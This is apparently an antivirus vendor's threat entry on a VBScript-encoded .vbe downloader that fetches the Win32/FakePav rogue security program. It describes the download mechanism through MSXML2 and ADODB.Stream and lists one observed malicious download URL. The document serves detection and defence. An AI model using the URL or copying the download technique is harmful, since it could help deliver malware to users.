This threat is a file that is used to download rogue security software programs that we detect as Win32/FakePav.
It is a .vbe file that is encoded with Visual Basic script (VBS).
When run, the file tries to connect to a predefined server that is encoded in the file, hence the server changes between versions. It tries to download a file from the server, which it saves to the %TEMP% folder as a .exe file.
We have seen it download setup.exe.vbe from the following servers and files:
- <hexadecimal value>-a941e09a8ebc3a85367c1ba4d545bd67.r11.cf2.rackcdn.com/7b46a66b3ce37eb916e5e89b76968f48.exe
The downloaded file installs the Win32/FakePav rogue onto your PC.
It uses the document object model (DOM) controls MSXML2.XMLHXXP and ADODB.Stream for communication and file transfer purposes to download the .exe file.
Some variants use signed VBS files.
Analysis by Wei Li